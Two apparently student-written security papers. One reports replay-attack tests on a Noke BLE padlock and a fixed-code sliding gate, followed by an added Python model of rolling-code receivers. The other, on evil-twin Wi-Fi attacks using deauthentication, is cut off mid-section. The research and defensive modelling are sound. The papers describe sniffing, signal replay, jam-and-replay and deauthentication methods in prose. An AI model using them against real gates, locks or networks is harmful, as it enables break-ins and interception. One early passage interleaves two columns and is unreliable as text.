Figure 13 : Detailed Phone Application (Finger) Flow

HOME SECURITY

Guo Jiaqi, National University of Singapore, School of Computing, A0130646L, a0130646@u.nus.edu
Kowshik Sundararajan, National University of Singapore, School of Computing, A0132791E, kowshik.sundararajan@u.nus.edu
Low Yong Siang, National University of Singapore, School of Computing, A0139392X, e0003277@u.nus.edu
Muhammad Mustaqiim Bin Muhar, National University of Singapore, School of Computing, A0138664W, mustaqiim.muhar@u.nus.edu
Mun Le Yuan, National University of Singapore, School of Computing, A0143853A, e0007868@u.nus.edu

ABSTRACT
In this paper, we will be illustrating our methodology in testing the security of two home devices: a sliding gate and a smart lock, Noke. We conducted our test on Noke with a BLE Sniffer, Bluefruit LE Sniffer, to obtain BLE packets for further analysis with Wireshark. Our test on the sliding gate security mechanism was conducted with a software defined radio (SDR) and a Raspberry Pi as a transmitter for replaying the radio signal. In each of these tests, we intended to capture communication packets sent to and from the home devices and replay them to test the susceptibility of each of the devices to replay attacks.

Categories and Subject Descriptors
B.4.1 [Input/output and Data Communications]: Data Communication Devices, C.2.2 [Computer System Organization]: Network Protocols, C.2.3 [Computer System Organization]: Network Operations – Applications (Bluetooth), Network Monitoring.

General Terms
Documentation, Experimentation, Security.

requirement, low cost and compatibility with a large number of hardware. There are a number of markets for BLE, especially in the smart home, healthcare and sports sectors.

BLE shares the same spectrum range (the 2.400 - 2.4835 GHz ISM band) as Classic Bluetooth but instead of using 79 1MHz channels, BLE uses 40 2MHz channels. Similar to Classic Bluetooth, data is transmitted using Gaussian frequency shift modulation within a channel.

2.2 BLE Security
The 128-bit AES-CCM encryption scheme is used to prevent passive man-in-the-middle (MITM) eavesdropping attacks on a BLE link. Two BLE devices need to set up pairing before communication can be encrypted. The Security Manager Protocol (SMP) carries out the pairing process in three steps:

1. Initially, one of the BLE devices will send a “pairing request” to the other device. Then, the two devices announce their input and output capabilities, which are used to determine if they are going to set up a secure connection in Step 2. [2] It is important to note that all data exchanged during this step is unencrypted.
Keywords 2. When Step 1 is done, the devices will generate and exchange
Home Security, Sliding Gate, Padlock, Noke, Smart Locks, the Temporary Key (TK) using one of the pairing methods
Vulnerabilities, Replay Attack, Raspberry Pi. mentioned below. Then, the two devices will verify that they
use the same TK by exchanging Confirm and Rand Values.
1. INTRODUCTION After that, they will use the TK and some random number to
As technology advances, devices are starting to become more create the Short Term Key (STK). The STK is then used to
interconnected in order to bring about convenience to the users. In encrypt the connection. [2]
recent years, this convenience has been brought to homes, turning 3. This step is optional. It is only used if bonding requirements
homes into smart homes, where home devices can now connect to were exchanged in Step 1. In this step, each device will
the Internet and be controlled by phones. But the added distribute to other devices these several transport specific
convenience comes at cost - security. How secure are these smart keys: Long Term Key (LTK), Connection Signature
devices? Resolving Key (CSRK), Identity Resolving Key (IRK). [2]

This project aims to look at how secure two of such smart home There are three pairing methods available for BLE secure
devices are by testing if a replay attack would allow adversaries to connections for Bluetooth 4.0:
compromise the security of the devices.
1. Just Works: In Just Works, the TK is always 0. This is
2. BLUETOOTH LOW ENERGY obviously an insecure method. There is no protection against
MITM attacks due to the lack of authentication between the
2.1 What is Bluetooth Low Energy? two devices. [3]
Bluetooth Low Energy (BLE), also known as Bluetooth Smart, is a
subset of classic Bluetooth and was introduced as part of the
2. Passkey: In Passkey, the TK is an identical 6-digit number
Bluetooth 4.0 core specification. It is characterised by its low power
between 0 and 999,999. The rest of the key is padded with

zeroes. [3] The Passkey method is much more resilient to MITM attacks than Just Works. Initially, a device will generate a 6-digit PIN, and display it to the user. The user of the other device then enters the same PIN number on that device to complete the authentication process. However, a brute force attack can crack a 6-digit number very quickly. In fact, there is BLE encryption cracking software, such as crackle, that can crack the TK easily. With the TK, crackle can derive all further keys during the encrypted session that immediately follows pairing. [4]

3. Out of Band (OOB) pairing: In OOB pairing, the TK is exchanged via a different wireless technology such as NFC. As the most secure out of the three pairing methods, the BLE connection can be assumed to be immune to passive eavesdropping and MITM attacks if the OOB channel is secure. [2]

2.3 BLE Communication
Bluetooth Low Energy allows nearby devices to communicate in two different ways: Broadcasting and Connections. These two mechanisms are subject to the Generic Attribute Profile (GAP) which decides how two BLE devices communicate with each other.

2.3.1 Broadcasting
Devices do not have to explicitly connect to each other to transfer data. Using connectionless broadcasting, data can be sent out to any scanning device or receiver in listening range. [14] As illustrated in Figure 1, broadcasting allows you to send out your data one-way to anyone that can receive the transmitted data.

Figure 1. Broadcast topology

There are two roles in this mechanism:
• Broadcaster: A device that broadcasts public advertising data packets to anyone who would like to receive them. [13]
• Observer: A device that listens to the data in the advertising packets sent by the broadcaster. [13]

The advantage of Broadcasting is that it is fast and easy to use. It will be a good choice if only small amounts of data need to be pushed on a fixed schedule or to multiple devices. However, the major problem of broadcasting is the lack of security and privacy. Any device within the listening range is able to receive the data. Therefore this mechanism is only suitable for the transmission of non-sensitive data.

2.3.2 Connections
Devices have to explicitly connect to each other and handshake with each other to transfer data. Connections allow devices to transmit data in both directions. A connection is a permanent, periodical data exchange of packets between two devices. It is therefore inherently private. [14]

Connections involve two roles:
• Central (Master): A device that repeatedly scans the pre-set frequencies for connectable advertising packets and, when suitable, initiates a connection. When a peripheral device accepts the request, a connection is built. The central device starts to manage the timing and initiates the periodical data exchanges.
• Peripheral (Slave): A device that sends connectable advertising packets periodically and accepts incoming connection requests. [14] Once connected, the peripheral device follows the central device’s timing and exchanges data regularly with it.

The biggest advantage of connections, as compared to broadcasting, is the ability to organize data by using additional protocol layers, and more specifically Generic Attribute Profiles (GATT), so that each field or attribute can be controlled at a finer grain. [14] Generic Attribute Profiles (GATT) is a server-client protocol. The main job of the GATT server is to store attributes, and make the attributes available when the client makes a request. A client can read and/or write attributes found in the GATT server once it sends a request to the GATT server. [13]

2.4 BLE in Home IoT Security
Increasingly, as smart homes become more popular, traditional deadbolts are slowly being replaced by smart locks which allow home users the convenience of unlocking their door with their phones instead of the traditional key. With added convenience, some of these locks allow the user to send the digital keys to anyone or even unlock their door from anywhere in the world, as long as there is connectivity. For close distance authentication of the home owner, or authorized guests, these locks make use of Bluetooth Low Energy to communicate.

2.5 Noke
Noke is a keyless smart padlock that can be unlocked by a smartphone that has the Noke app installed. It connects to the user’s smartphone through Bluetooth Low Energy, which uses 128-bit AES-CCM encryption securing all communication between Noke and the smartphone, and has been claimed to use PKI technology and a cryptographic key exchange protocol. On top of software security, Noke has a boron hardened steel shackle with the latest anti-shim technology to ensure mechanical hardware security. The Noke app also has other features such as allowing the owner to share and revoke access to the lock and allowing the owner to know when, where and by whom the locks were accessed.

2.6 BLE Sniffing Hardware
In order to see what is otherwise invisible to the naked eye, we make use of the Adafruit BLE sniffer and Wireshark to capture and analyse the Bluetooth Low Energy packets that are transmitted from the smartphone to the Noke lock.

2.6.1 Adafruit BLE Sniffer
Adafruit BLE Sniffer is an adapter which is programmed with a custom firmware from Nordic Semiconductor to be an easy-to-use Bluetooth Low Energy Sniffer. It is able to passively capture BLE packets and data exchanges between two Bluetooth Low Energy enabled devices, which in our case, would be the Noke padlock and an Android phone running the Noke application.

The packets captured by the sniffer can be visualised using an open source packet analysis tool such as Wireshark with useful descriptors so that every packet makes sense. There are a couple of tools a user can use to start sniffing for BLE packets:
For Windows users: Nordic’s official nRF Sniffer Utility application, which is a command line interface.
For Macintosh users: The open source application ble-sniffer-osx.
For Linux users: Adafruit provides Python binding software which does the same thing.
Ultimately, all of this software is able to write its output to a .pcap file, which can then be opened in Wireshark to analyse the captured packets.

2.7 Experiment

2.7.1 Preliminary Findings
Initially, it was tough latching onto the channel which Noke was advertising on since one of its BLE characteristics was to hop between 3 different channels during advertisement. Once we managed to get the Adafruit sniffer to hook onto a channel, it continued to monitor the connection between the master (Android phone) and slave (Noke).

The first few packets after the connection request looked unencrypted as there were no Control Opcode: LL_START_ENC_REQ packets. It made sense that there was no encryption on the Bluetooth link layer as there was no pairing request during the first set-up. Subsequent packets were not encrypted on the link layer. Hence, we further analysed the packets after the connection request.

2.7.2 Wireshark Analysis
We ran a few tests collecting samples of Noke’s communication with the Android phone and observed how the communication was made. The analysis below was based on our NOKE(YS7).pcap capture. [12] The first meaningful packet always consisted of a simple “Write Request” command with a handle of 0x000c.

The second packet consisted of a “Write Command” operation with a handle of 0x000e and a payload which we assumed was encrypted. This second packet was actually repeated when the padlock was “re-unlocked” within the same app session. The value only changed when the lock disconnected and reconnected with the application re-opened and the cycle restarted from Packet 1.

Following that, the third meaningful packet received was a notification from the padlock back to the Android phone with a handle of 0x000b.

The fourth packet contained a “Write Command” with the handle 0x000e. We assumed that this was the actual “Unlock” command as the following packet contained the same payload as Packet 2 above which hinted to us that it was the re-unlock step we took within the same minute.

From the analysis, it seemed as though there was some handshake happening within Packets 2 and 3 and the 4th packet was making use of the handshake secret to send over the unlock padlock command. Since the values did not change when we tried to unlock the padlock a few times, we suspected that there was probably some mechanism within the application layer that was doing the encryption, decryption and setting up the unlock session. Therefore, replaying the value did not do much to the lock unfortunately.

2.8 3rd Party Researcher Findings
While we were trying to reverse engineer those values, we managed to find another security researcher online who was also researching the same Bluetooth padlock and found a flaw in it. [11] The researcher was able to decompile the .apk file of Noke and found that the developer hardcoded the AES key which encrypts the communication between the padlock and the application. Hence, there was application layer encryption being applied to each packet going back and forth between the lock and the app. Furthermore, packets 2 and 3, which we also discovered during our sniffing attempts, were random numbers being exchanged between the two devices. Those random number packets were also encrypted with the hardcoded AES key.

With reference to the Morphus Labs findings, we tried to recreate what he discovered based on the latest Noke APK, which was v2.0.2. After decompiling the application, we found that most parts of the application have been obfuscated but unfortunately the hardcoded AES key can still be found within the obfuscated code.

We then tried to decrypt the packet which we discovered during our sniffing attempts and came back with the following results. The packet header / type seemed to be similar and not changed when compared to the other researcher’s findings. The thing which is different now is that the payload formatting seems to be different, hence we infer that there might be some logic change within the code base.

2.9 Analysis of Noke BLE Communication
Through our packet analysis of the communication between the Noke Android App and the Noke padlock, we came up with the finding that after the app notifies the lock that it wants to write, the app will first generate some kind of one-time value and then send over the value to the lock. The lock then notifies and sends back another value to the app. From then onwards, the “Unlock” command is sent over to the padlock. All the communication is encrypted between both devices. The encryption as of now is broken since the hardcoded key still exists within their latest code base. Given more time, we’ll be able to run a static analysis tool against the apk to monitor its behaviour and perhaps try to figure out what is going on in the backend which crafts the packet payload. As of now the decrypted payload remains some gibberish value.

3. RADIO FREQUENCY
Radio frequency is any of the electromagnetic wave frequencies that lie in the range extending from around 3 kHz to 300 GHz. From planes in the skies to the FM radio that brings radio station broadcasts to your automobile, radio frequency is used almost everywhere. Given its capability of transmitting over long distances, radio frequency is a cheap and effective way to transmit data and for devices to communicate.

3.1 Security in Radio Spectrum
However, radio frequency is lacking in security. With the right tools, which do not cost a lot, anyone is able to download the relevant programs such as GQRX or SDR# and start listening in on these invisible signals.

Some home devices use these signals to communicate with each other, such as a wireless doorbell, while some other devices use these signals to authenticate the owner for their entry, like a sliding gate in most private homes. In this project, we will be studying the latter case; that is, the radio frequency used in the operation of sliding gates in homes.

3.2 Terminology
First of all, modulation: it is a process of varying one or more properties of a periodic waveform, also known as a carrier signal, with a modulating signal that typically contains information to be transmitted. These are some different modulations [9]:
1. Amplitude modulation (AM): The height (or the amplitude) of the signal carrier is varied to represent the data.
2. Frequency modulation (FM): Contrasting with AM, the amplitude does not change and the varying instantaneous frequency of the carrier waveform reflects the data. For example, a higher frequency of the waveform represents a binary one, while a lower frequency represents a binary zero.
3. Phase modulation (PM): Similar but not the same as FM, phase modulation varies the frequency of the carrier waveform to reflect changes in the frequency of the data.
4. Polarization modulation: Angle of rotation of an optical carrier signal is varied to reflect transmitted data.
5. Pulse-code modulation: Method to convert analogue signals to digital ones so that the digital signals can be transmitted through digital communication.
6. Pulse-width modulation: A modulation technique used to encode a message into a pulsing signal.

Secondly, given the large range of frequencies that the device can take, it is important to know which frequency the device is communicating on. A frequency band is an interval in the frequency domain, delimited by a lower frequency and an upper frequency. In Singapore, the Info-Communications Media Development Authority is in charge of frequency allocation and assignment. [8]

There are two main ways radio frequency is used in a remote control: fixed code or rolling code. Fixed code and rolling code have this in common: they send out a code, and if the code is the same as the one expected by the receiver, the receiver actuates the relay and operates the hardware, be it a lock or a gate motor. However, the main difference is this: remote controls with a fixed code will always send out the same signal code, while ones with rolling code will send out a unique code every time, in an attempt to prevent replay attacks.

Lastly, a Software Defined Radio (SDR) is a radio communication device where one can tune the radio frequency to listen to through software. It is a cheap alternative for anyone who wants to listen in on these invisible radio signals and we will be using one in this project.

3.3 Replay Attack

3.3.1 Sniffing and Decoding the signal
Since we had the actual hardware remote on hand, we did not need to sit around and listen to the whole range of frequencies before identifying the frequency band on which the remote is communicating. Opening up the outer plastic case of the remote, we found out that the remote is communicating on a 330MHz frequency band. Confirming with the SDR, we set the frequency to 330MHz and indeed we got a signal when the remote was pressed, as shown in the diagram below.

We were able to view the waveform using audio editing software such as Audacity to decode the signal manually. As we compared the waveform file, we found that the signal was repetitive and identical. This meant that the sliding gate was making use of a fixed code remote control, that is, the code sent out was always the same, which was susceptible to replay attacks.

Apart from decoding manually, we got to know of a tool, rtl_433, that allows us to use the SDR to tune into the frequency we wanted and listen in on that signal while the program helps us to decode the signal. Using rtl_433 (with the -f flag and -A flag), we managed to decode the signal received by the SDR. The image below shows the screenshot of the signal captured using the SDR and then passed through the rtl_433 program.

As you can see, the signals that were being received by the SDR were always the same, exposing the underlying fixed code mechanism implemented in the gate system. If we were to study the waveform of the .wav file that was being recorded in GQRX, we would be able to spot repetitive patterns of the waveform.

3.3.2 Transmitting the Signal
Using GQRX, we recorded a wav file of the unlock signal. We found a program that allowed us to transmit radio waves through the GPIO pin of the Raspberry Pi, called rpitx. After installing rpitx on the Raspberry Pi, we proceeded to re-emit the recorded wav file.

Apart from using GQRX, rtl_sdr, rtl_fm or similar programs, we were also able to record the signal through Raspberry Pi commands with an SDR connected to the Raspberry Pi USB port.

3.4 Rolling code vs. Fixed Code
In Singapore, sliding gates predominantly use the fixed code mechanism. This is due to the cost of replacing the remote control. The embedded hardware from the gate motor manufacturer (the more advanced ones) has its own rolling code system; however, due to the cost of getting the remotes replaced, vendors add on another receiver to communicate with a 3rd party remote control, and those controls use fixed code, thus impairing the security measures against replay attacks.

Although the rolling code mechanism would make it harder for adversaries to get past the sliding gate, it does have its own vulnerabilities. Given that every signal sent out is different from the previous signal, there are ways around the system that exploit this as well. The scenario below demonstrates one way that the adversary can bypass the security in the rolling code mechanism:

The adversary can jam the signal around the receiver with radio noise so that the first signal is unable to unlock the sliding gate. When the user is unable to unlock the sliding gate on the first press, the user would press the remote again. As the jamming device is programmed to record and jam that second signal, while replaying the first signal, the gate will be unlocked. At any point in time, when the device detects a new signal, it jams that signal and replays the previous signal to unlock the gate. The adversary would be able to retrieve the jamming device with a stored rolling code to conduct a replay attack at any time he chooses.

4. ADD ON PROTOTYPE FOR GATE
As mentioned earlier, the current implementation of the sliding gate security is not sufficient, be it a fixed code or rolling code implementation. As the remote simply provides the signal for the receiver to match and actuate the relay, any device capable of receiving any signal and analysing it for matches would be able to toggle the switch to high or low in software, rotating the gear in the process. Thus, we propose an idea of providing an add-on for the existing sliding gate security that is an improvement on the existing system but does not cost much to change.

Going away from radio frequency, we looked into the Raspberry Pi, a computing device that can be programmed to do almost anything. Furthermore, as the Raspberry Pi is a programmable device, further advancement can be made to allow it to communicate and automate the sliding gate, possible ideas of which will be discussed in the appendix.

The following shows the connection diagram of the add-on and our implementation based on socket programming:

5. ACKNOWLEDGMENTS
We would like to extend our gratitude to Prof Hugh Anderson for his continuous guidance and support throughout this project. He has been very helpful in loaning us the equipment needed for this project.

6. REFERENCES
[1] Encryption Key Generation and Distribution. (2017). Teledyne Lecroy Everywhereyoulook. Retrieved 10 November 2017, from https://www.fte.com/webhelp/sodera/Content/Documentation/WhitePapers/BTLE/EncryptionKeyGenerationAndDistribution.htm
[2] Bon, M. (2017). A Basic Introduction to BLE Security – Wireless – eewiki. Eewiki.net. Retrieved 10 November 2017, from https://eewiki.net/display/Wireless/A+Basic+Introduction+to+BLE+Security#ABasicIntroductiontoBLESecurity-SecurityIssuesFacingBLE
[3] Balmus, A. (2017). Bluetooth Low Energy SMP Pairing | NXP Community. Community.nxp.com. Retrieved 10 November 2017, from https://community.nxp.com/thread/332191

[4] Crackle, crack Bluetooth Smart (BLE) encryption. (2017) Lacklustre.net. Retrieved 10 November 2017, from https://lacklustre.net/projects/crackle/
[5] Townsend, K. (n.d.). Introduction to Bluetooth Low Energy: GATT. Retrieved 10 November 2017, from https://learn.adafruit.com/introduction-to-bluetooth-low-energy/gatt
[6] Milovanovic, V. (2017) Bluetooth Low Energy – Part 1: Introduction to BLE – MikroElektronika Learn. MikroElektronika Learn. Retrieved 10 November 2017, from https://learn.mikroe.com/bluetooth-low-energy-part-1-introduction-ble/
[7] 1, L. (2017). What’s The Difference Between Bluetooth Low Energy And ANT? Electronic Design. Retrieved 10 November 2017, from https://www.electronicdesign.com/mobile/what-s-difference-between-bluetooth-low-energy-and-ant
[8] Infocomm Media Development Authority (3 November 2017). Frequency Allocation & Assignment. Retrieved 10 November 2017, from https://www.imda.gov.sg/regulations-licensing-and-consultations/frameworks-and-policies/spectrum-management-and-coordination/frequency-allocation-and-assignment
[9] Rouse, M. (2017). What is modulation? – Definition from WhatIs.com. SearchNetworking. Retrieved 10 November 2017, from http://searchnetworking.techtarget.com/definition/modulation
[10] Tutorial: Replay Attack with an RTL-SDR, Raspberry Pi and RPiTX. (2017). Rtl-sdr.com. Retrieved 10 November 2017, from http://www.rtl-sdr.com/tutorial-replay-attacks-with-an-rtl-sdr-raspberry-pi-and-rpitx/
[11] Pasknel, V. (2017). Hacking the Nokē Padlock – Morphus Labs. Morphus Labs. Retrieved 19 November 2017, from https://morphuslabs.com/hacking-the-nok%C4%93-padlock-adfe7b1b5617
[12] Mustaqiim, M. (2017). Noke Packet Capture. https://github.com/YongSiang94/GateSecurity/blob/master/Noke/Noke%20Packet%20Capture/NOKE(YS7).pcap
[13] Punch Through. (2017). Punchthrough.com. Retrieved 19 November 2017, from https://punchthrough.com/bean/docs/guides/everything-else/how-gap-and-gatt-work/
[14] Getting Started with Bluetooth Low Energy. (2017). O’Reilly | Safari. Retrieved 19 November 2017, from https://www.safaribooksonline.com/library/view/getting-started-with/9781491900550/ch01.html
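
The fixed-code and rolling-code receivers compared in Sections 3.2 and 3.4 of this paper can be modelled in a few lines to show which frames each one accepts. This is an added example, not the project's code and not any vendor's protocol: the frame layout (counter plus truncated HMAC-SHA256), the look-ahead window of 16 and all keys and codes are assumptions made for illustration.

```python
"""Fixed-code and rolling-code receivers as a simplified model (not a vendor protocol)."""
import hashlib
import hmac
import struct

TAG_LEN = 8  # bytes of HMAC kept in each frame (assumption for this model)


def make_frame(key: bytes, counter: int) -> bytes:
    """Frame = 4-byte big-endian counter || truncated HMAC-SHA256(key, counter)."""
    ctr = struct.pack(">I", counter)
    return ctr + hmac.new(key, ctr, hashlib.sha256).digest()[:TAG_LEN]


class FixedCodeReceiver:
    """Actuates the relay whenever the received code equals the stored one."""

    def __init__(self, code: bytes):
        self._code = code

    def accept(self, frame: bytes) -> bool:
        return hmac.compare_digest(frame, self._code)


class RollingRemote:
    """Remote control that sends a fresh frame on every press."""

    def __init__(self, key: bytes):
        self._key = key
        self._counter = 0

    def press(self) -> bytes:
        self._counter += 1
        return make_frame(self._key, self._counter)


class RollingCodeReceiver:
    """Accepts a frame only if its tag verifies and its counter moves forward."""

    def __init__(self, key: bytes, window: int = 16):
        self._key = key
        self._last = 0         # highest counter accepted so far
        self._window = window  # how far ahead of the receiver the remote may be

    def accept(self, frame: bytes) -> bool:
        if len(frame) != 4 + TAG_LEN:
            return False
        counter = struct.unpack(">I", frame[:4])[0]
        if not hmac.compare_digest(frame, make_frame(self._key, counter)):
            return False       # forged or corrupted frame
        if not (self._last < counter <= self._last + self._window):
            return False       # already used, superseded, or too far ahead
        self._last = counter
        return True


def demo() -> dict:
    """Run both receivers over constructed frames and return what each accepted."""
    results = {}

    code = b"\x5a\xc3\x0f\x99"                 # constructed fixed code
    fixed = FixedCodeReceiver(code)
    results["fixed_first"] = fixed.accept(code)
    results["fixed_replay"] = fixed.accept(code)   # identical bytes work again

    key = b"constructed-demo-key"              # constructed shared secret
    remote, gate = RollingRemote(key), RollingCodeReceiver(key)
    f1 = remote.press()
    results["rolling_first"] = gate.accept(f1)
    results["rolling_replay"] = gate.accept(f1)    # counter did not move forward
    results["rolling_forged"] = gate.accept(struct.pack(">I", 2) + bytes(TAG_LEN))

    # Section 3.4's limitation: a frame that never reached the receiver is unused,
    # so it still verifies when it arrives later.
    f2 = remote.press()
    results["undelivered_still_valid"] = gate.accept(f2)

    # Once a newer frame has been accepted, an older undelivered one is rejected.
    f3, f4 = remote.press(), remote.press()
    gate.accept(f4)
    results["stale_after_newer"] = gate.accept(f3)

    # Failure mode: many presses out of range push the remote past the window.
    for _ in range(20):
        far = remote.press()
    results["out_of_window"] = gate.accept(far)
    return results


if __name__ == "__main__":
    for name, accepted in demo().items():
        print(f"{name:26s} accepted={accepted}")
```

The window bounds how far the remote may run ahead of the receiver; a larger window tolerates more stray presses but keeps undelivered frames usable for longer.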

Exploration of the evil twin attack on Wi-Fi access points and countermeasure

Melvin Soh, National University of Singapore, e0002846@u.nus.edu
Rajendran Premkumar, National University of Singapore, a0126219@u.nus.edu
Tiago Kieliger, National University of Singapore, tiago.kieliger@gmail.com
Valérian Rey, National University of Singapore, e0216407@u.nus.edu
Yoshiaki Nishimura, National University of Singapore, yoshiaki.n@u.nus.edu

ABSTRACT
This project addresses security flaws in the design of IEEE 802.11 (more commonly known as the Wi-Fi protocol) that allow an attacker to clone an existing access point and direct the traffic to that malicious clone with the goal of acquiring a man in the middle position. In this paper, we will explore how an attacker might create a clone of an Access Point, how he disconnects existing users from that network and how the users will connect to the “Evil Twin”. We will also explore various countermeasures against these techniques and also propose our own solutions.

Categories and Subject Descriptors
C.2.0 [Computer-Communication Networks]: General---Security and Protection;
C.2.2 [Computer-Communication Networks]: Network Protocols---Protocol Verification, Wi-Fi Protocols;

General Terms
Experimentation, Security

Keywords
Wi-Fi, Deauthentication, WPA, Evil twin, hotspot, access point, spoofing, man-in-the-middle, WPA2

1. INTRODUCTION
In any place in the city, when we scan for available Wi-Fi networks on our devices we get a long list of networks; some are protected, while others are not. Most of us would have the experience of trying to connect to any of the open networks hoping for a free internet connection. For example in Singapore there are more than 3500 unsecured access points provided by the government [3]. At home, we are used to connecting to our own protected Wi-Fi from our mobile devices. But how do we ever know that the networks we connect to are what they claim to be? In this project, we attempt to explore various techniques to actively gain a man-in-the-middle position between a Wi-Fi AP (we will extensively use the term AP in this report as a shorthand for access point) and its users after the connection between them is already established (whether protected or not). Hoping that a user connects to an evil AP by himself is more related to social engineering and is thus not discussed here. We have worked both on unprotected AP (open Wi-Fi connection that does not require a password and that is not encrypted), evidently easier, and Wi-Fi Protected Access 2 (WPA2), today’s most common Wi-Fi security protocol. Other security protocols, such as Wireless Equivalent Privacy (WEP) or the first version of WPA, are not used anymore today because of the security flaws that they contained, and are thus not discussed here. This man-in-the-middle position is a necessary starting point for several different attacks that one can try to achieve. For that reason, making sure a network is not being spoofed is an important step towards making the Wi-Fi setup secure for its users. That is why we also explore various ways of protecting against this “Evil Twin” attack. We will describe this attack in detail later on.

Throughout this report, we will be referring to the term “open Wi-Fi”. We are going to define its meaning as follows:

1. Wi-Fi network with no encryption scheme, or
2. Protected Wi-Fi network with its key made available to the public.

The second definition is realistic in some settings: for example, a fast-food store may have a WPA2-protected network whose key will be provided upon the purchase of the store’s food or service.

2. MAN-IN-THE-MIDDLE
A man-in-the-middle (MiTM) is a type of attack where a malicious user M monitors the communication between two users A and B. Both A and B think they are directly connected to each other, while in fact M is receiving all the messages from A to B and from B to A, and relays them to B or to A. If this communication is not encrypted, the malicious user has access to all the private data transmitted, and has the possibility of sending malicious messages instead of just relaying the conversation.

2.1 MiTM on Open AP

Figure 1. MiTM on Open AP

In the case of an open Wi-Fi (unprotected or WPA2 encrypted with known key), a client A (a mobile phone or a laptop, say) is connected to the legitimate AP, which is the gateway router and thus provides a connection to the rest of the network (i.e. to the internet). In this setup we will consider a MiTM in the form of a rogue AP which will trick client A into thinking that it is the legitimate AP using a deauthentication attack that will be thoroughly described later on. Of course the rogue AP can then itself connect to the internet by any means, such as a broadband cellular network, another access point, or even through the legitimate AP itself.

This situation is depicted in the above diagram, where the red arrows show the connections after the rogue AP has acquired a MiTM position.

Since in this communication we either know the WPA2 key, or there is no encryption at all, the rogue AP can reliably read, block, modify or inject packets, which opens the door to a whole range of attacks. As an example, in our demonstration we use the MiTM position to redirect all the web traffic from the client to a crafted HTTP server.

2.2 MiTM on WPA2 secured AP

Figure 2. MiTM on WPA2 secured AP

The MiTM attack on a WPA2 secured AP is slightly different from that on an open AP since we assume that the connection between the client and the AP is encrypted. In this case if a rogue AP M manages to trick client A into communicating with it, it cannot directly act as an access point since the packets received are encrypted. However, the attacker M can transmit the packets received from A to the legitimate AP S and also transmit packets received from S to A. Figure 2 depicts this setup.

In this situation A and S are not aware that all their communications are going through M. This allows M to reliably block or replay packets. This raises security concerns: the recently discovered attack that defeats WPA2 provides a perfect example. The key reinstallation attack needs this MiTM position to reliably control the packets sent between the client and the AP [6]. In particular, being able to reliably block specific packets allows the attacker to exploit a vulnerability in the WPA2 4-way handshake.

3. VULNERABILITIES AND EXPLOITS
In this section we will describe various vulnerabilities of wireless devices and the protocol they currently use and then combine those in order to perform a MiTM attack.

3.1 Frames
The Wi-Fi protocol defines various types of frames used by the clients and the access points to communicate. A few examples are the data frame, which encapsulates data from higher layers, the beacon frame, which is emitted periodically by an AP to advertise its presence, or the deauthentication frame which terminates the communication between a client and an AP. The latter is of particular interest since a weakness in its conception opens the door to the so-called deauthentication attack. We leverage this flaw in our project in order to get a MiTM position.

3.2 Deauthentication Attack
The deauthentication frame is sent by a station to another when it wants to terminate the communication between the two, and can be sent at any point in time while the two stations are connected. The major flaw resides in the fact that this deauthentication frame is not itself cryptographically authenticated in any way, even when the connection is WPA2 secured. This deauthentication frame can even be broadcast in order to terminate all the ongoing connections with a particular AP. As such an attacker can impersonate an AP and broadcast deauthentication frames to all the users connected to it and thus terminate all the ongoing connections within the targeted network. Figure 3 illustrates this process:

Figure 3. Deauthentication attack

Depending on its configuration, the client’s firmware may try to resume the connection promptly after receiving the deauthentication frame from the AP. Sending many spoofed deauthentication packets in short time intervals prevents the client from accessing the server at all. This denial of service attack (DoS) is very effective against any access point or client that is IEEE 802.11 compliant.

3.3 ESSID, BSSID and Channels
In this section we will delve into different properties of APs which will be relevant when it comes to the evil twin attack. A basic property that everyone knows about, though maybe under a different name, is the ESSID. In fact, the ESSID, which stands for extended service set identification, is nothing but the name of the access point. This name is not unique and can be shared by many distinct APs. Then there is the BSSID, which stands for basic service set identification, that is the MAC address of the AP. This 48-bit identifier is supposed to be unique but there is no verification whatsoever and it can thus be spoofed. Finally an AP has to transmit on a given channel, where each channel corresponds to a range of radio frequencies. Some countries have different regulations concerning different channels but the details of it are not relevant to the discussion. For example channel 10 is centred at 2.457 GHz with a width of 22 MHz. Usually APs tend to use different channels so as not to interfere with each other, though it is possible to have multiple APs, even with the same ESSID, on the same channel as long as their BSSIDs are different.

3.4 Evil Twin Attack on Open Wi-Fi
When connected to a particular AP, a device will remember its ESSID to reconnect to it later on. This depends on the device and may be disabled in some cases, but most people are used to their computer automatically connecting to known APs, so we assume that this feature is enabled. If multiple APs with the same known ESSID are available, the device chooses the one with the stronger signal. This behaviour, combined with the deauthentication attack, can be leveraged to perform the so-called “evil twin attack”. The setup is as follows: suppose a client is connected to an unprotected AP with ESSID “free_wifi”. An attacker can set up a rogue AP (the evil twin) with the same ESSID (i.e. “free_wifi”) as the target on a different channel (the BSSID can be arbitrary). Even if the signal of this rogue AP is stronger than the legitimate one, this will not make the client connect to it. In order to achieve that the attacker performs a deauthentication attack, which will disconnect the client. Upon reconnection, the client will connect to the rogue AP given that its signal is stronger (which is a strong assumption). At this point the attacker has successfully acquired a MiTM position.

3.5 Evil Twin Attack on WPA2 Secured Wi-Fi
As we have seen in section 2.2, a MiTM on a WPA2 secured Wi-Fi does not try to decrypt the packets but only forwards them between the client and the AP. To achieve this, we proceed as for the open Wi-Fi case, with the difference that the MAC address of the rogue AP cannot be arbitrary, but must be identical to that of the legitimate AP. In fact, this is necessary because the session key used by the client and legitimate AP to communicate depends on the key, the client’s and the AP’s MAC addresses [5]. The deauthentication attack works just as well as for the open Wi-Fi case since the deauthentication frame is not authenticated as discussed in section 3.2.

4. IMPLEMENTATION ON OPEN Wi-Fi
In this section, we will discuss the implementation of our demonstration for the evil twin attack on open Wi-Fi. We will cover the material used as well as the code we developed for this purpose.

4.1 Tools
In the next sections we will describe in detail the setup we used and the software we developed in order to achieve a successful evil twin attack on an open AP and on a WPA2 secured AP.

4.1.1 Hardware
The setup needed for this demonstration consists of 3 distinct entities, which are the client, the AP and the attacker. For the client we experimented with different devices such as an Android phone, an iOS phone, a Linux laptop and a Windows laptop. In each case the attack worked. For the legitimate AP we used a TP-LINK M7350 mobile Wi-Fi, but any commercial access point can be used. The most important part is the hardware used by the attacker: we used a laptop running on Linux with an integrated wireless chip, combined with 2 USB Wi-Fi dongles. The attacker runs a software AP on his machine. This requires two distinct network interfaces, one called the facing interface which connects the laptop to the internet, while the other acts as the rogue access point. Moreover an additional network interface is needed to perform the deauthentication attack. This interface needs to be compatible with the aircrack-ng software [2], which we will describe in the next section. For this we used a TP-LINK WN722N USB dongle.

4.1.2 Software
